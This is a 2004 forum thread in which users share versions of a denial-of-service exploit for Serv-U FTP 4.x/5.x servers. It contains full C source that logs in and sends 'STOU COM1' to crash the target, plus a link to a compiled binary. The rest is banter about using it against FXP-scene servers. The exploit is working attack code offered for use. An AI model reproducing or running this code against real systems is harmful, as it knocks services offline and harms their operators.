[agathos]

Ecko your perl version is good and very good readable :)
mortello your C code is a bit of crap sorry :) but for the first try ok
use the Socket System

here is my C version

/******************************
 * ---------------------------
 * � � �Serv-U 4.x 5.x 
 * � � � DOS EXPLOIT
 * � � �by cyrex@EFNet
 *
 ********
 * Greetz
 * ------
 * 
 * �- Ecko ( For his perl version )
 * �- mortello ( for his try to code in C :p)
 * �- and all others
 *
 *
 * 
 * BUG Discovery:
 * 
 * �cyrex@saturn:~$ ./sudos 192.168.1.5 1024 cyrex test
 * �------------------------------------
 * �Serv-U 4.x 5.x DOS Exploit
 * �by cyrex@EFNet 
 * �-------------------------------------
 * �[+] - Connection to 192.168.1.5
 * �220 Serv-U FTP Server v5.1 for WinSock ready...
 * �331 User name okay, need password.
 * �230 User logged in, proceed.
 * �[+] - Connected.. Sending the last command
 * �[*] - Target should now be destroyed..
 * �cyrex@saturn:~$
 *
 **************************/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define DEBUG

int fd;

int sendtotarget(char *str) { 
	int extern fd;
	int d; char nc[2048];
	sprintf(nc,"%s\r\n",str);
	d=send(fd,nc,strlen(nc),0);
	if (!d) { printf("[-] Cannot send Data\n"); }
	return(0);
}
void help(char *prog) 
{
 � � � �printf("------------------------------------\n");
 � � � �printf(" Serv-U 4.x 5.x DOS Exploit\n");
 � � � �printf(" by cyrex@EFNet\n");
 � � � �printf("-------------------------------------\n");
	printf("Usage: %s <servername> <serverport> [username] [password]\n",prog);
	exit(-1);
}	
void conn(char *serv,int port,char *user,char *pass)
{
	struct hostent *he;
	struct sockaddr_in client;
	char buffer[513];
	char check[1024];
	char *pack;
	int forked = 0;
	int b;
	if((he=gethostbyname(serv))==NULL)
	{
 �exit(-1);
	}
	if((fd=socket(AF_INET,SOCK_STREAM,0))==-1){
 �exit(-1);
	}
	client.sin_family = AF_INET;
	client.sin_port = htons(port);
	client.sin_addr = *((struct in_addr *)he->h_addr);
	if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
 �printf("[*] - Connection to %s Failed\n",serv);
 �exit(-1);
	}
	sprintf(buffer,"USER %s",user);
	sendtotarget(buffer);
	sprintf(buffer,"PASS %s",pass);
	sendtotarget(buffer);

	memset(check,"x00",strlen(check));

	recv(fd,check,sizeof(check),0);
#ifdef DEBUG
	printf("%s",check);
#endif
	if(strstr(check,"530")) { 
 �printf("[!] - Error Invalid username or Password\n");
 �exit(-1);
	} else {

	printf("[+] - Connected.. Sending the last command\n");
	sprintf(buffer,"STOU COM1");
	sendtotarget(buffer);
	printf("[*] - Target should now be destroyed..\n");
 }
}

int main(int argc, char *argv[])
{
	int port;
	printf("------------------------------------\n");
	printf(" Serv-U 4.x 5.x DOS Exploit\n");
	printf(" by cyrex@EFNet\n");
	printf("-------------------------------------\n");
	if((!argv[1]) || (!argv[2]))
	{
 �help(argv[0]);
 �exit(-1);
	}
	port=atoi(argv[2]);
	printf("[+] - Connection to %s\n",argv[1]);
	conn(argv[1],port,argv[3],argv[4]);
}

Greets cyrex

[mortello]

Good job....and yeah I know my code was not so good....btw read PM :)

[Hellraiseruk]

what is the point of keep making different versions of this so called "exploit" all it is doing is destoying peoples hard work on there servers unless u achuly get a shell :blink:

[Tyrano]

programming practice :D

[KuerbY]

its about: "(filtered) the fxp crap"
we hate them we just only hate them :P
and the versions are different...
just dont install servu or a trojan write your own "programs" like cyrex etc etc ;)

[Progressor]

This is a wrong section. This section called "Files downloads", I don't see any file.

[agathos]

Progessor , dont have a own compiler? ;D and it isnt the wrong Section btw
You can download the Source Code or not ? :=)


here the compiled version of mine

Attached File(s)

•  sudos.zip (512.93K)
  Number of downloads: 495

[KuerbY]

i dont want to be an ass but...
i dont like compiled exploit, source or nothing i dont trust anyone then myself :P
so i think everyone got a good compiler...

[Hellraiseruk]

KuerbY, on Sep 14 2004, 10:49 AM, said:

its about: "(filtered) the fxp crap"
we hate them we just only hate them :P
and the versions are different...
just dont install servu or a trojan write your own "programs" like cyrex etc etc ;)

u hate them? well the fxp scene gets things on to IRC and p2p networks for u little n00bie kids to download just cuz u don't have axx..some gelously :P

[agathos]

fxp scene suc ks very very ;D join site scene

[cyrixx]

but not everyone has the chance to join a site...

[TRi]

All these arrogance in this world, its a shame.

You guys fit perfectly to the 17th centuy, looking down on the normal people above from your high and great palaces. Be lucky of yourself and if you enjoy showing off with it, well then thats your business..

[Ecko]

Hellraiseruk, on Sep 14 2004, 06:30 AM, said:

what is the point of keep making different versions of this so called "exploit" all it is doing is destoying peoples hard work on there servers unless u achuly get a shell :blink:

peoples hard work!? :blink: you mean fxp pplz whick hacked btw. owned :lol: a Server and installed there a ftpd? hm, when that's of hard for u then i don't wanna know whats easy for you :P